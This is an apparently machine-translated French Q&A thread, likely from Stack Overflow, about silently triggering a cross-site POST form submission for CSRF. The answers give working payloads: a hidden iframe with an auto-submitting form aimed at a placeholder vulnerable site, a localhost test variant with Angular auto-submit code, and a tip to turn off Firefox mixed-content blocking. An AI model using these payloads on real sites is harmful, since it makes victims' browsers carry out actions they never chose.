Exemple d'silencieusement de la soumission d'un FORMULAIRE POST (CSRF)

Je suis intéressé à savoir comment il est possible d'en silence soumettre un formulaire POST pour CSRF, sans que l'utilisateur ait tout avis (l'emplacement du document redirigé vers le Posté l'URL n'est pas silencieux).

Exemple:

<form method='POST' action='http://vulnerablesite.com/form.php'>
<input type='hidden' name='criticaltoggle' value='true'
<input type='submit' value='submit'>
</form>

Sur un site externe, de quoi aurais-je besoin de faire pour déclencher cette forme automatiquement et silencieusement?

OriginalL'auteur apscience | 2013-07-30

  1. 43

    Une solution serait d'ouvrir l'action du formulaire dans un cadre comme un iframe:

    <iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='criticaltoggle' value='true'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>

    OriginalL'auteur Gumbo

  2. 2

    Lors de l'essai de CSRF localement, vous pouvez avoir à surmonter plusieurs mesures de sécurité.

    Pour Blocked loading mixed active content erreurs, d'assurer le protocole (http/https) de l'attaquant du site et le site cible sont les mêmes, ou d'utiliser des "//" comme protocole pour l'attaquant du site. Exemple d'attaque sur localhost:

    <iframe style="display:none" id="csrf-frame-invisible" name="csrf-frame-invisible"></iframe>
<form style="display:none" method='POST' action='//localhost:4000' target="csrf-frame-invisible" name="csrf-form-invisible" id="csrf-form-invisible">
  <input type='hidden' name='boo' value='true'>
  <input type='submit' value='Submit'>
</form>

    Également définir Firefox security.mixed_content.block_active_content à false.

    Si vous utilisez Angulaire, les options de sécurité vous empêcher de vous à l'aide de javascript en ligne, de sorte que vous aurez besoin pour aller de le soumettre à un code-behind sur l'attaquant site:

    ngOnInit() {
   const myForm: HTMLFormElement = document.getElementById('csrf-form-invisible') as HTMLFormElement;
   myForm.submit();
}

    Enfin l'attaquant du site d'en-tête 'x-frame-options" ne doit pas être fixé.

    OriginalL'auteur RJFalconer